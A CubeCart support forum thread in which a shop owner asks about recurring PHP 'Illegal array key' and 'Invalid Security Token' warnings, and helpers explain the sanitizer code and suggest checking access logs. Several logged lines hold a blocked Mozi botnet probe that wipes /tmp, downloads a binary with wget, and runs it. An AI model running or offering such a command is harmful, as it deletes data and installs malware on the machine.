Jump to content

error log


Richard1967
 Share

Recommended Posts

Hi All

Noticed this in the error log, is it anything to be worried about?

[04-Nov-2021 00:56:32 UTC] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[04-Nov-2021 01:34:54 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
Link to comment
Share on other sites

Seems to be on a daily basis since April, Novembers log

[01-Nov-2021 01:04:45 UTC] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 02:16:47 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 02:25:15 UTC] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_http://192_168_1_1:8088/Mozi_a;chmod_777_Mozi_a;/tmp/Mozi_a_jaws" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 02:25:41 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 02:36:12 UTC] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_http://192_168_1_1:8088/Mozi_a;chmod_777_Mozi_a;/tmp/Mozi_a_jaws" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 03:27:05 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 04:11:15 UTC] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 05:39:07 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 06:50:54 UTC] PHP Warning:  Security Warning: Illegal array key "style/" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 08:18:46 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 10:24:17 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 10:39:30 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 11:43:45 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 11:50:01 UTC] PHP Warning:  Security Warning: Illegal array key "style/" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 14:55:30 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 14:55:41 UTC] PHP Warning:  unlink(/home/roznzsnx/public_html/cache/4781b.sql.1f18a3fd1f4c82371a87d325449f4489.cache) [<a href='http://docs.php.net/manual/en/function.unlink.php'>function.unlink.php</a>]: No such file or directory in /home/roznzsnx/public_html/classes/cache/file.class.php on line 180
[01-Nov-2021 14:55:42 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 15:10:21 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 19:51:25 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 19:51:26 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 19:58:24 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 21:05:38 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 21:21:48 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 00:53:44 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 03:10:51 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[02-Nov-2021 03:36:37 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 03:42:56 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 03:52:56 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 09:36:00 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[02-Nov-2021 11:55:59 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 15:58:22 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 16:11:25 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 17:05:33 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 19:51:11 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[02-Nov-2021 21:14:11 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 02:19:52 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 02:19:54 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 06:15:30 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 06:59:42 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[03-Nov-2021 09:45:52 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 12:57:21 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 13:28:37 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:24:28 UTC] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_http://192_168_1_1:8088/Mozi_a;chmod_777_Mozi_a;/tmp/Mozi_a_jaws" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[03-Nov-2021 15:45:50 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:45:51 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:52:34 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:54:51 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 19:40:56 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 20:47:57 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 21:42:45 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[04-Nov-2021 00:56:32 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[04-Nov-2021 01:34:54 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 05:47:04 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 05:55:11 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 08:34:01 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 09:01:28 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 10:02:49 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 10:55:07 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 11:15:46 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 12:47:24 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 12:47:25 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
Edited by Richard1967
Link to comment
Share on other sites

Within cubecart system error logs there are these

  • Notice Error - These are unlikely to cause operatinal problems and can be thought of as best practice recommendations. Action is not required.
  • Warning Error - These are unlikely to cause operational problems now but there is a problem, one that is likely to cause bigger issues in the future. Action is recommended.
  • Parse Error - These are caused by misused or missing symbols in a syntax. Action is required.
  • Fatal Error - These are are classified as critical errors. Action is required.
  • Exception Error - These are are classified as critical errors. Action is required.

 

Link to comment
Share on other sites

The above colored notices are simply an advisory of what various errors mean and how worried one should be about them.

As for the logged errors themselves, my next step would be to acquire the web server's access logs. By aligning the times (adjusting the hours for timezone differences), we can see what and where the queries are coming from.

The web server's access logs are generally enabled and are found through the management control panel (Cpanel?) for your site as provided by your hosting provider.

Link to comment
Share on other sites

Hi

Had a response from the hosting site

.htaccess is generated on your account by CubeCart - I would suggest that you ask them to check what permissions should be set for the files it needs to access

[04-Nov-2021 12:47:25 UTC] PHP Warning: Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155

sanitize.class.php again is a CubeCart file - you would need to find out from them what might be the likely cause.

Link to comment
Share on other sites

So, if we narrowed down to line 114, it's this trigger_error line

Something from $data has made it upset. 

&lt; is <

        if (is_array($data)) {
            foreach ($data as $key => $value) {
                //Make sure the variable's key name is a valid one
                if (preg_match('#([^a-z0-9\-\_\:\@\|])#i', urldecode($key))) {
                    trigger_error('Security Warning: Illegal array key "'.htmlentities($key).'" was detected and was removed.', E_USER_WARNING);
                    unset($data[$key]);
                    continue;
                } else {
                    if (is_array($value)) {
                        self::_clean($data[$key]);
                    } else {
                        // If your HTML content isn't in a field with one of the following names, it's going!
                        // We shold probably standardise the field names in the future
                        if (!empty($value)) {
                            $data[$key] = self::_safety($value);
                        }
                    }
                }
            }
Edited by Tony
Link to comment
Share on other sites

Yes. Unfortunately, CubeCart does not give us the name of the incoming array where it found this illegal key.

As such, we can discover what might be causing this only from the $_GET array - as that array is provided by the URL's querystring, which should show in the web server's access logs.

If the illegal key is in the $_POST array (the POST payload of the incoming data), or the $_COOKIE array, we would need to rewrite a portion of CubeCart's code to log the name of the array being scanned, as well as the neutered key itself.

We can still align the access log entry by the time stamp with the error log to see where the page request is coming from.

 

Link to comment
Share on other sites

1 hour ago, bsmither said:

Yes. Unfortunately, CubeCart does not give us the name of the incoming array where it found this illegal key.

As such, we can discover what might be causing this only from the $_GET array - as that array is provided by the URL's querystring, which should show in the web server's access logs.

If the illegal key is in the $_POST array (the POST payload of the incoming data), or the $_COOKIE array, we would need to rewrite a portion of CubeCart's code to log the name of the array being scanned, as well as the neutered key itself.

We can still align the access log entry by the time stamp with the error log to see where the page request is coming from.

 

I don't know how to access the log entry unfortunately 

Link to comment
Share on other sites

We would like to know if your site is hosted with anyone. If so, they have probably provided you with a means to manage the site's settings via a "control panel". (Some names of popular control panels are: Cpanel and Plesk.)

Within the control panel, there would be a section of tools and features that deal with 'Metrics". Within that section would be a tool to download "Raw Access". (The file will likely be compressed: zip, tar, etc.)

Once uncompressed on your local computer, the listing will have what we need to scan for.

 

Edited by bsmither
Link to comment
Share on other sites

It is compressed.

Undoubtedly, you have a utility on your computer to decompress various types of compressed files.

If, for some reason, you don't have such a utility, feel free to attach it to a PM addressed directly to me.

 

Link to comment
Share on other sites

Does your site respond to any other domain name? Almost all "Illegal array key" entries are at a time not found in the access log for "receka.co.uk".

Otherwise, everything else is just the result of non-personal, happens to everyone, probing for specific vulnerabilities that exist across a very wide range of internet-connected hardware and applications (nothing specific to CubeCart).

 

Link to comment
Share on other sites

No just receka

I have 3 cubecart sites & they all have the same error logs.

[05-Nov-2021 20:35:02 Europe/London] PHP Warning:  No callback method defined. in /home/ctncrtns/public_html/classes/cubecart.class.php on line 311
[05-Nov-2021 21:01:20 Europe/London] PHP Warning:  Invalid Security Token in /home/ctncrtns/public_html/classes/sanitize.class.php on line 155
[05-Nov-2021 23:02:23 Europe/London] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/ctncrtns/public_html/classes/sanitize.class.php on line 114
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...